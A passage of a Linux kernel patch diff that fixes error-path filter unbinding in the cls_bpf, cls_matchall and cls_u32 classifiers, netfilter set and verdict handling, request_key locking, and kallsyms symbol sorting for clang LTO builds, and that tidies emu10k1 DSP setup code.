+@@ -10114,6 +10116,9 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 
+ 	if (!tb[NFTA_VERDICT_CODE])
+ 		return -EINVAL;
++
++	/* zero padding hole for memcmp */
++	memset(data, 0, sizeof(*data));
+ 	data->verdict.code = ntohl(nla_get_be32(tb[NFTA_VERDICT_CODE]));
+ 
+ 	switch (data->verdict.code) {
+@@ -10395,6 +10400,9 @@ static void __nft_release_table(struct net *net, struct nft_table *table)
+ 	ctx.family = table->family;
+ 	ctx.table = table;
+ 	list_for_each_entry(chain, &table->chains, list) {
++		if (nft_chain_is_bound(chain))
++			continue;
++
+ 		ctx.chain = chain;
+ 		list_for_each_entry_safe(rule, nr, &chain->rules, list) {
+ 			list_del(&rule->list);
+diff --git a/net/netfilter/nft_set_pipapo.c b/net/netfilter/nft_set_pipapo.c
+index 0452ee586c1cc..a81829c10feab 100644
+--- a/net/netfilter/nft_set_pipapo.c
++++ b/net/netfilter/nft_set_pipapo.c
+@@ -1930,7 +1930,11 @@ static void nft_pipapo_remove(const struct net *net, const struct nft_set *set,
+ 		int i, start, rules_fx;
+ 
+ 		match_start = data;
+-		match_end = (const u8 *)nft_set_ext_key_end(&e->ext)->data;
++
++		if (nft_set_ext_exists(&e->ext, NFT_SET_EXT_KEY_END))
++			match_end = (const u8 *)nft_set_ext_key_end(&e->ext)->data;
++		else
++			match_end = data;
+ 
+ 		start = first_rule;
+ 		rules_fx = rules_f0;
+diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c
+index bc317b3eac124..0320e11eb248b 100644
+--- a/net/sched/cls_bpf.c
++++ b/net/sched/cls_bpf.c
+@@ -404,56 +404,6 @@ static int cls_bpf_prog_from_efd(struct nlattr **tb, struct cls_bpf_prog *prog,
+ 	return 0;
+ }
+ 
+-static int cls_bpf_set_parms(struct net *net, struct tcf_proto *tp,
+-			     struct cls_bpf_prog *prog, unsigned long base,
+-			     struct nlattr **tb, struct nlattr *est, u32 flags,
+-			     struct netlink_ext_ack *extack)
+-{
+-	bool is_bpf, is_ebpf, have_exts = false;
+-	u32 gen_flags = 0;
+-	int ret;
+-
+-	is_bpf = tb[TCA_BPF_OPS_LEN] && tb[TCA_BPF_OPS];
+-	is_ebpf = tb[TCA_BPF_FD];
+-	if ((!is_bpf && !is_ebpf) || (is_bpf && is_ebpf))
+-		return -EINVAL;
+-
+-	ret = tcf_exts_validate(net, tp, tb, est, &prog->exts, flags,
+-				extack);
+-	if (ret < 0)
+-		return ret;
+-
+-	if (tb[TCA_BPF_FLAGS]) {
+-		u32 bpf_flags = nla_get_u32(tb[TCA_BPF_FLAGS]);
+-
+-		if (bpf_flags & ~TCA_BPF_FLAG_ACT_DIRECT)
+-			return -EINVAL;
+-
+-		have_exts = bpf_flags & TCA_BPF_FLAG_ACT_DIRECT;
+-	}
+-	if (tb[TCA_BPF_FLAGS_GEN]) {
+-		gen_flags = nla_get_u32(tb[TCA_BPF_FLAGS_GEN]);
+-		if (gen_flags & ~CLS_BPF_SUPPORTED_GEN_FLAGS ||
+-		    !tc_flags_valid(gen_flags))
+-			return -EINVAL;
+-	}
+-
+-	prog->exts_integrated = have_exts;
+-	prog->gen_flags = gen_flags;
+-
+-	ret = is_bpf ? cls_bpf_prog_from_ops(tb, prog) :
+-		       cls_bpf_prog_from_efd(tb, prog, gen_flags, tp);
+-	if (ret < 0)
+-		return ret;
+-
+-	if (tb[TCA_BPF_CLASSID]) {
+-		prog->res.classid = nla_get_u32(tb[TCA_BPF_CLASSID]);
+-		tcf_bind_filter(tp, &prog->res, base);
+-	}
+-
+-	return 0;
+-}
+-
+ static int cls_bpf_change(struct net *net, struct sk_buff *in_skb,
+ 			  struct tcf_proto *tp, unsigned long base,
+ 			  u32 handle, struct nlattr **tca,
+@@ -461,9 +411,12 @@ static int cls_bpf_change(struct net *net, struct sk_buff *in_skb,
+ 			  struct netlink_ext_ack *extack)
+ {
+ 	struct cls_bpf_head *head = rtnl_dereference(tp->root);
++	bool is_bpf, is_ebpf, have_exts = false;
+ 	struct cls_bpf_prog *oldprog = *arg;
+ 	struct nlattr *tb[TCA_BPF_MAX + 1];
++	bool bound_to_filter = false;
+ 	struct cls_bpf_prog *prog;
++	u32 gen_flags = 0;
+ 	int ret;
+ 
+ 	if (tca[TCA_OPTIONS] == NULL)
+@@ -502,11 +455,51 @@ static int cls_bpf_change(struct net *net, struct sk_buff *in_skb,
+ 		goto errout;
+ 	prog->handle = handle;
+ 
+-	ret = cls_bpf_set_parms(net, tp, prog, base, tb, tca[TCA_RATE], flags,
+-				extack);
++	is_bpf = tb[TCA_BPF_OPS_LEN] && tb[TCA_BPF_OPS];
++	is_ebpf = tb[TCA_BPF_FD];
++	if ((!is_bpf && !is_ebpf) || (is_bpf && is_ebpf)) {
++		ret = -EINVAL;
++		goto errout_idr;
++	}
++
++	ret = tcf_exts_validate(net, tp, tb, tca[TCA_RATE], &prog->exts,
++				flags, extack);
++	if (ret < 0)
++		goto errout_idr;
++
++	if (tb[TCA_BPF_FLAGS]) {
++		u32 bpf_flags = nla_get_u32(tb[TCA_BPF_FLAGS]);
++
++		if (bpf_flags & ~TCA_BPF_FLAG_ACT_DIRECT) {
++			ret = -EINVAL;
++			goto errout_idr;
++		}
++
++		have_exts = bpf_flags & TCA_BPF_FLAG_ACT_DIRECT;
++	}
++	if (tb[TCA_BPF_FLAGS_GEN]) {
++		gen_flags = nla_get_u32(tb[TCA_BPF_FLAGS_GEN]);
++		if (gen_flags & ~CLS_BPF_SUPPORTED_GEN_FLAGS ||
++		    !tc_flags_valid(gen_flags)) {
++			ret = -EINVAL;
++			goto errout_idr;
++		}
++	}
++
++	prog->exts_integrated = have_exts;
++	prog->gen_flags = gen_flags;
++
++	ret = is_bpf ? cls_bpf_prog_from_ops(tb, prog) :
++		cls_bpf_prog_from_efd(tb, prog, gen_flags, tp);
+ 	if (ret < 0)
+ 		goto errout_idr;
+ 
++	if (tb[TCA_BPF_CLASSID]) {
++		prog->res.classid = nla_get_u32(tb[TCA_BPF_CLASSID]);
++		tcf_bind_filter(tp, &prog->res, base);
++		bound_to_filter = true;
++	}
++
+ 	ret = cls_bpf_offload(tp, prog, oldprog, extack);
+ 	if (ret)
+ 		goto errout_parms;
+@@ -528,6 +521,8 @@ static int cls_bpf_change(struct net *net, struct sk_buff *in_skb,
+ 	return 0;
+ 
+ errout_parms:
++	if (bound_to_filter)
++		tcf_unbind_filter(tp, &prog->res);
+ 	cls_bpf_free_parms(prog);
+ errout_idr:
+ 	if (!oldprog)
+diff --git a/net/sched/cls_matchall.c b/net/sched/cls_matchall.c
+index 39a5d9c170def..43f8df5847414 100644
+--- a/net/sched/cls_matchall.c
++++ b/net/sched/cls_matchall.c
+@@ -157,26 +157,6 @@ static const struct nla_policy mall_policy[TCA_MATCHALL_MAX + 1] = {
+ 	[TCA_MATCHALL_FLAGS]		= { .type = NLA_U32 },
+ };
+ 
+-static int mall_set_parms(struct net *net, struct tcf_proto *tp,
+-			  struct cls_mall_head *head,
+-			  unsigned long base, struct nlattr **tb,
+-			  struct nlattr *est, u32 flags, u32 fl_flags,
+-			  struct netlink_ext_ack *extack)
+-{
+-	int err;
+-
+-	err = tcf_exts_validate_ex(net, tp, tb, est, &head->exts, flags,
+-				   fl_flags, extack);
+-	if (err < 0)
+-		return err;
+-
+-	if (tb[TCA_MATCHALL_CLASSID]) {
+-		head->res.classid = nla_get_u32(tb[TCA_MATCHALL_CLASSID]);
+-		tcf_bind_filter(tp, &head->res, base);
+-	}
+-	return 0;
+-}
+-
+ static int mall_change(struct net *net, struct sk_buff *in_skb,
+ 		       struct tcf_proto *tp, unsigned long base,
+ 		       u32 handle, struct nlattr **tca,
+@@ -185,6 +165,7 @@ static int mall_change(struct net *net, struct sk_buff *in_skb,
+ {
+ 	struct cls_mall_head *head = rtnl_dereference(tp->root);
+ 	struct nlattr *tb[TCA_MATCHALL_MAX + 1];
++	bool bound_to_filter = false;
+ 	struct cls_mall_head *new;
+ 	u32 userflags = 0;
+ 	int err;
+@@ -224,11 +205,17 @@ static int mall_change(struct net *net, struct sk_buff *in_skb,
+ 		goto err_alloc_percpu;
+ 	}
+ 
+-	err = mall_set_parms(net, tp, new, base, tb, tca[TCA_RATE],
+-			     flags, new->flags, extack);
+-	if (err)
++	err = tcf_exts_validate_ex(net, tp, tb, tca[TCA_RATE],
++				   &new->exts, flags, new->flags, extack);
++	if (err < 0)
+ 		goto err_set_parms;
+ 
++	if (tb[TCA_MATCHALL_CLASSID]) {
++		new->res.classid = nla_get_u32(tb[TCA_MATCHALL_CLASSID]);
++		tcf_bind_filter(tp, &new->res, base);
++		bound_to_filter = true;
++	}
++
+ 	if (!tc_skip_hw(new->flags)) {
+ 		err = mall_replace_hw_filter(tp, new, (unsigned long)new,
+ 					     extack);
+@@ -244,6 +231,8 @@ static int mall_change(struct net *net, struct sk_buff *in_skb,
+ 	return 0;
+ 
+ err_replace_hw_filter:
++	if (bound_to_filter)
++		tcf_unbind_filter(tp, &new->res);
+ err_set_parms:
+ 	free_percpu(new->pf);
+ err_alloc_percpu:
+diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
+index a3477537c102b..1280736a7b92e 100644
+--- a/net/sched/cls_u32.c
++++ b/net/sched/cls_u32.c
+@@ -710,8 +710,23 @@ static const struct nla_policy u32_policy[TCA_U32_MAX + 1] = {
+ 	[TCA_U32_FLAGS]		= { .type = NLA_U32 },
+ };
+ 
++static void u32_unbind_filter(struct tcf_proto *tp, struct tc_u_knode *n,
++			      struct nlattr **tb)
++{
++	if (tb[TCA_U32_CLASSID])
++		tcf_unbind_filter(tp, &n->res);
++}
++
++static void u32_bind_filter(struct tcf_proto *tp, struct tc_u_knode *n,
++			    unsigned long base, struct nlattr **tb)
++{
++	if (tb[TCA_U32_CLASSID]) {
++		n->res.classid = nla_get_u32(tb[TCA_U32_CLASSID]);
++		tcf_bind_filter(tp, &n->res, base);
++	}
++}
++
+ static int u32_set_parms(struct net *net, struct tcf_proto *tp,
+-			 unsigned long base,
+ 			 struct tc_u_knode *n, struct nlattr **tb,
+ 			 struct nlattr *est, u32 flags, u32 fl_flags,
+ 			 struct netlink_ext_ack *extack)
+@@ -758,10 +773,6 @@ static int u32_set_parms(struct net *net, struct tcf_proto *tp,
+ 		if (ht_old)
+ 			ht_old->refcnt--;
+ 	}
+-	if (tb[TCA_U32_CLASSID]) {
+-		n->res.classid = nla_get_u32(tb[TCA_U32_CLASSID]);
+-		tcf_bind_filter(tp, &n->res, base);
+-	}
+ 
+ 	if (ifindex >= 0)
+ 		n->ifindex = ifindex;
+@@ -901,17 +912,27 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
+ 		if (!new)
+ 			return -ENOMEM;
+ 
+-		err = u32_set_parms(net, tp, base, new, tb,
+-				    tca[TCA_RATE], flags, new->flags,
+-				    extack);
++		err = u32_set_parms(net, tp, new, tb, tca[TCA_RATE],
++				    flags, new->flags, extack);
+ 
+ 		if (err) {
+ 			__u32_destroy_key(new);
+ 			return err;
+ 		}
+ 
++		u32_bind_filter(tp, new, base, tb);
++
+ 		err = u32_replace_hw_knode(tp, new, flags, extack);
+ 		if (err) {
++			u32_unbind_filter(tp, new, tb);
++
++			if (tb[TCA_U32_LINK]) {
++				struct tc_u_hnode *ht_old;
++
++				ht_old = rtnl_dereference(n->ht_down);
++				if (ht_old)
++					ht_old->refcnt++;
++			}
+ 			__u32_destroy_key(new);
+ 			return err;
+ 		}
+@@ -1072,15 +1093,18 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
+ 	}
+ #endif
+ 
+-	err = u32_set_parms(net, tp, base, n, tb, tca[TCA_RATE],
++	err = u32_set_parms(net, tp, n, tb, tca[TCA_RATE],
+ 			    flags, n->flags, extack);
++
++	u32_bind_filter(tp, n, base, tb);
++
+ 	if (err == 0) {
+ 		struct tc_u_knode __rcu **ins;
+ 		struct tc_u_knode *pins;
+ 
+ 		err = u32_replace_hw_knode(tp, n, flags, extack);
+ 		if (err)
+-			goto errhw;
++			goto errunbind;
+ 
+ 		if (!tc_in_hw(n->flags))
+ 			n->flags |= TCA_CLS_FLAGS_NOT_IN_HW;
+@@ -1098,7 +1122,9 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
+ 		return 0;
+ 	}
+ 
+-errhw:
++errunbind:
++	u32_unbind_filter(tp, n, tb);
++
+ #ifdef CONFIG_CLS_U32_MARK
+ 	free_percpu(n->pcpu_success);
+ #endif
+diff --git a/net/wireless/wext-core.c b/net/wireless/wext-core.c
+index fe8765c4075d3..8a4b85f96a13a 100644
+--- a/net/wireless/wext-core.c
++++ b/net/wireless/wext-core.c
+@@ -799,6 +799,12 @@ static int ioctl_standard_iw_point(struct iw_point *iwp, unsigned int cmd,
+ 		}
+ 	}
+ 
++	/* Sanity-check to ensure we never end up _allocating_ zero
++	 * bytes of data for extra.
++	 */
++	if (extra_size <= 0)
++		return -EFAULT;
++
+ 	/* kzalloc() ensures NULL-termination for essid_compat. */
+ 	extra = kzalloc(extra_size, GFP_KERNEL);
+ 	if (!extra)
+diff --git a/scripts/kallsyms.c b/scripts/kallsyms.c
+index 03fa07ad45d95..80aab2aa72246 100644
+--- a/scripts/kallsyms.c
++++ b/scripts/kallsyms.c
+@@ -5,7 +5,8 @@
+  * This software may be used and distributed according to the terms
+  * of the GNU General Public License, incorporated herein by reference.
+  *
+- * Usage: nm -n vmlinux | scripts/kallsyms [--all-symbols] > symbols.S
++ * Usage: kallsyms [--all-symbols] [--absolute-percpu]
++ *                         [--base-relative] [--lto-clang] in.map > out.S
+  *
+  *      Table compression uses all the unused char codes on the symbols and
+  *  maps these to the most used substrings (tokens). For instance, it might
+@@ -49,6 +50,7 @@ _Static_assert(
+ struct sym_entry {
+ 	unsigned long long addr;
+ 	unsigned int len;
++	unsigned int seq;
+ 	unsigned int start_pos;
+ 	unsigned int percpu_absolute;
+ 	unsigned char sym[];
+@@ -77,6 +79,7 @@ static unsigned int table_size, table_cnt;
+ static int all_symbols;
+ static int absolute_percpu;
+ static int base_relative;
++static int lto_clang;
+ 
+ static int token_profit[0x10000];
+ 
+@@ -88,7 +91,7 @@ static unsigned char best_table_len[256];
+ static void usage(void)
+ {
+ 	fprintf(stderr, "Usage: kallsyms [--all-symbols] [--absolute-percpu] "
+-			"[--base-relative] in.map > out.S\n");
++			"[--base-relative] [--lto-clang] in.map > out.S\n");
+ 	exit(1);
+ }
+ 
+@@ -116,6 +119,7 @@ static bool is_ignored_symbol(const char *name, char type)
+ 		"kallsyms_markers",
+ 		"kallsyms_token_table",
+ 		"kallsyms_token_index",
++		"kallsyms_seqs_of_names",
+ 		/* Exclude linker generated symbols which vary between passes */
+ 		"_SDA_BASE_",		/* ppc */
+ 		"_SDA2_BASE_",		/* ppc */
+@@ -410,6 +414,65 @@ static int symbol_absolute(const struct sym_entry *s)
+ 	return s->percpu_absolute;
+ }
+ 
++static char * s_name(char *buf)
++{
++	/* Skip the symbol type */
++	return buf + 1;
++}
++
++static void cleanup_symbol_name(char *s)
++{
++	char *p;
++
++	if (!lto_clang)
++		return;
++
++	/*
++	 * ASCII[.]   = 2e
++	 * ASCII[0-9] = 30,39
++	 * ASCII[A-Z] = 41,5a
++	 * ASCII[_]   = 5f
++	 * ASCII[a-z] = 61,7a
++	 *
++	 * As above, replacing the first '.' in ".llvm." with '\0' does not
++	 * affect the main sorting, but it helps us with subsorting.
++	 */
++	p = strstr(s, ".llvm.");
++	if (p)
++		*p = '\0';
++}
++
++static int compare_names(const void *a, const void *b)
++{
++	int ret;
++	char sa_namebuf[KSYM_NAME_LEN];
++	char sb_namebuf[KSYM_NAME_LEN];
++	const struct sym_entry *sa = *(const struct sym_entry **)a;
++	const struct sym_entry *sb = *(const struct sym_entry **)b;
++
++	expand_symbol(sa->sym, sa->len, sa_namebuf);
++	expand_symbol(sb->sym, sb->len, sb_namebuf);
++	cleanup_symbol_name(s_name(sa_namebuf));
++	cleanup_symbol_name(s_name(sb_namebuf));
++	ret = strcmp(s_name(sa_namebuf), s_name(sb_namebuf));
++	if (!ret) {
++		if (sa->addr > sb->addr)
++			return 1;
++		else if (sa->addr < sb->addr)
++			return -1;
++
++		/* keep old order */
++		return (int)(sa->seq - sb->seq);
++	}
++
++	return ret;
++}
++
++static void sort_symbols_by_name(void)
++{
++	qsort(table, table_cnt, sizeof(table[0]), compare_names);
++}
++
+ static void write_src(void)
+ {
+ 	unsigned int i, k, off;
+@@ -495,6 +558,7 @@ static void write_src(void)
+ 	for (i = 0; i < table_cnt; i++) {
+ 		if ((i & 0xFF) == 0)
+ 			markers[i >> 8] = off;
++		table[i]->seq = i;
+ 
+ 		/* There cannot be any symbol of length zero. */
+ 		if (table[i]->len == 0) {
+@@ -535,6 +599,12 @@ static void write_src(void)
+ 
+ 	free(markers);
+ 
++	sort_symbols_by_name();
++	output_label("kallsyms_seqs_of_names");
++	for (i = 0; i < table_cnt; i++)
++		printf("\t.long\t%u\n", table[i]->seq);
++	printf("\n");
++
+ 	output_label("kallsyms_token_table");
+ 	off = 0;
+ 	for (i = 0; i < 256; i++) {
+@@ -818,6 +888,7 @@ int main(int argc, char **argv)
+ 			{"all-symbols",     no_argument, &all_symbols,     1},
+ 			{"absolute-percpu", no_argument, &absolute_percpu, 1},
+ 			{"base-relative",   no_argument, &base_relative,   1},
++			{"lto-clang",       no_argument, &lto_clang,       1},
+ 			{},
+ 		};
+ 
+diff --git a/scripts/link-vmlinux.sh b/scripts/link-vmlinux.sh
+index 918470d768e9c..32e573943cf03 100755
+--- a/scripts/link-vmlinux.sh
++++ b/scripts/link-vmlinux.sh
+@@ -156,6 +156,10 @@ kallsyms()
+ 		kallsymopt="${kallsymopt} --base-relative"
+ 	fi
+ 
++	if is_enabled CONFIG_LTO_CLANG; then
++		kallsymopt="${kallsymopt} --lto-clang"
++	fi
++
+ 	info KSYMS ${2}
+ 	scripts/kallsyms ${kallsymopt} ${1} > ${2}
+ }
+diff --git a/security/keys/request_key.c b/security/keys/request_key.c
+index 07a0ef2baacd8..a7673ad86d18d 100644
+--- a/security/keys/request_key.c
++++ b/security/keys/request_key.c
+@@ -401,17 +401,21 @@ static int construct_alloc_key(struct keyring_search_context *ctx,
+ 	set_bit(KEY_FLAG_USER_CONSTRUCT, &key->flags);
+ 
+ 	if (dest_keyring) {
+-		ret = __key_link_lock(dest_keyring, &ctx->index_key);
++		ret = __key_link_lock(dest_keyring, &key->index_key);
+ 		if (ret < 0)
+ 			goto link_lock_failed;
+-		ret = __key_link_begin(dest_keyring, &ctx->index_key, &edit);
+-		if (ret < 0)
+-			goto link_prealloc_failed;
+ 	}
+ 
+-	/* attach the key to the destination keyring under lock, but we do need
++	/*
++	 * Attach the key to the destination keyring under lock, but we do need
+ 	 * to do another check just in case someone beat us to it whilst we
+-	 * waited for locks */
++	 * waited for locks.
++	 *
++	 * The caller might specify a comparison function which looks for keys
++	 * that do not exactly match but are still equivalent from the caller's
++	 * perspective. The __key_link_begin() operation must be done only after
++	 * an actual key is determined.
++	 */
+ 	mutex_lock(&key_construction_mutex);
+ 
+ 	rcu_read_lock();
+@@ -420,12 +424,16 @@ static int construct_alloc_key(struct keyring_search_context *ctx,
+ 	if (!IS_ERR(key_ref))
+ 		goto key_already_present;
+ 
+-	if (dest_keyring)
++	if (dest_keyring) {
++		ret = __key_link_begin(dest_keyring, &key->index_key, &edit);
++		if (ret < 0)
++			goto link_alloc_failed;
+ 		__key_link(dest_keyring, key, &edit);
++	}
+ 
+ 	mutex_unlock(&key_construction_mutex);
+ 	if (dest_keyring)
+-		__key_link_end(dest_keyring, &ctx->index_key, edit);
++		__key_link_end(dest_keyring, &key->index_key, edit);
+ 	mutex_unlock(&user->cons_lock);
+ 	*_key = key;
+ 	kleave(" = 0 [%d]", key_serial(key));
+@@ -438,10 +446,13 @@ key_already_present:
+ 	mutex_unlock(&key_construction_mutex);
+ 	key = key_ref_to_ptr(key_ref);
+ 	if (dest_keyring) {
++		ret = __key_link_begin(dest_keyring, &key->index_key, &edit);
++		if (ret < 0)
++			goto link_alloc_failed_unlocked;
+ 		ret = __key_link_check_live_key(dest_keyring, key);
+ 		if (ret == 0)
+ 			__key_link(dest_keyring, key, &edit);
+-		__key_link_end(dest_keyring, &ctx->index_key, edit);
++		__key_link_end(dest_keyring, &key->index_key, edit);
+ 		if (ret < 0)
+ 			goto link_check_failed;
+ 	}
+@@ -456,8 +467,10 @@ link_check_failed:
+ 	kleave(" = %d [linkcheck]", ret);
+ 	return ret;
+ 
+-link_prealloc_failed:
+-	__key_link_end(dest_keyring, &ctx->index_key, edit);
++link_alloc_failed:
++	mutex_unlock(&key_construction_mutex);
++link_alloc_failed_unlocked:
++	__key_link_end(dest_keyring, &key->index_key, edit);
+ link_lock_failed:
+ 	mutex_unlock(&user->cons_lock);
+ 	key_put(key);
+diff --git a/security/keys/trusted-keys/trusted_tpm2.c b/security/keys/trusted-keys/trusted_tpm2.c
+index 2b2c8eb258d5b..bc700f85f80be 100644
+--- a/security/keys/trusted-keys/trusted_tpm2.c
++++ b/security/keys/trusted-keys/trusted_tpm2.c
+@@ -186,7 +186,7 @@ int tpm2_key_priv(void *context, size_t hdrlen,
+ }
+ 
+ /**
+- * tpm_buf_append_auth() - append TPMS_AUTH_COMMAND to the buffer.
++ * tpm2_buf_append_auth() - append TPMS_AUTH_COMMAND to the buffer.
+  *
+  * @buf: an allocated tpm_buf instance
+  * @session_handle: session handle
+diff --git a/sound/pci/emu10k1/emufx.c b/sound/pci/emu10k1/emufx.c
+index 6cf7c8b1de47d..4ca65f425f39c 100644
+--- a/sound/pci/emu10k1/emufx.c
++++ b/sound/pci/emu10k1/emufx.c
+@@ -1563,14 +1563,8 @@ A_OP(icode, &ptr, iMAC0, A_GPR(var), A_GPR(var), A_GPR(vol), A_EXTIN(input))
+ 	gpr += 2;
+ 
+ 	/* Master volume (will be renamed later) */
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+0+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+0+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+1+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+1+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+2+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+2+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+3+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+3+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+4+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+4+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+5+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+5+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+6+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+6+SND_EMU10K1_PLAYBACK_CHANNELS));
+-	A_OP(icode, &ptr, iMAC0, A_GPR(playback+7+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+7+SND_EMU10K1_PLAYBACK_CHANNELS));
++	for (z = 0; z < 8; z++)
++		A_OP(icode, &ptr, iMAC0, A_GPR(playback+z+SND_EMU10K1_PLAYBACK_CHANNELS), A_C_00000000, A_GPR(gpr), A_GPR(playback+z+SND_EMU10K1_PLAYBACK_CHANNELS));
+ 	snd_emu10k1_init_mono_control(&controls[nctl++], "Wave Master Playback Volume", gpr, 0);
+ 	gpr += 2;
+ 
+@@ -1654,102 +1648,14 @@ A_OP(icode, &ptr, iMAC0, A_GPR(var), A_GPR(var), A_GPR(vol), A_EXTIN(input))
+ 			dev_dbg(emu->card->dev, "emufx.c: gpr=0x%x, tmp=0x%x\n",
+ 			       gpr, tmp);
+ 			*/
+-			/* For the EMU1010: How to get 32bit values from the DSP. High 16bits into L, low 16bits into R. */
+-			/* A_P16VIN(0) is delayed by one sample,
+-			 * so all other A_P16VIN channels will need to also be delayed
+-			 */
+-			/* Left ADC in. 1 of 2 */
+ 			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_P16VIN(0x0), A_FXBUS2(0) );
+-			/* Right ADC in 1 of 2 */
+-			gpr_map[gpr++] = 0x00000000;
+-			/* Delaying by one sample: instead of copying the input
+-			 * value A_P16VIN to output A_FXBUS2 as in the first channel,
+-			 * we use an auxiliary register, delaying the value by one
+-			 * sample
+-			 */
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(2) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x1), A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(4) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x2), A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(6) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x3), A_C_00000000, A_C_00000000);
+-			/* For 96kHz mode */
+-			/* Left ADC in. 2 of 2 */
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(0x8) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x4), A_C_00000000, A_C_00000000);
+-			/* Right ADC in 2 of 2 */
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(0xa) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x5), A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(0xc) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x6), A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16( icode, &ptr, tmp, bit_shifter16, A_GPR(gpr - 1), A_FXBUS2(0xe) );
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x7), A_C_00000000, A_C_00000000);
+-			/* Pavel Hofman - we still have voices, A_FXBUS2s, and
+-			 * A_P16VINs available -
+-			 * let's add 8 more capture channels - total of 16
+-			 */
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x10));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x8),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x12));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0x9),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x14));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xa),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x16));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xb),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x18));
+-			A_OP(icode, &ptr, iACC3, A_GPR(gpr - 1), A_P16VIN(0xc),
+-			     A_C_00000000, A_C_00000000);
+-			gpr_map[gpr++] = 0x00000000;
+-			snd_emu10k1_audigy_dsp_convert_32_to_2x16(icode, &ptr, tmp,
+-								  bit_shifter16,
+-								  A_GPR(gpr - 1),
+-								  A_FXBUS2(0x1a));
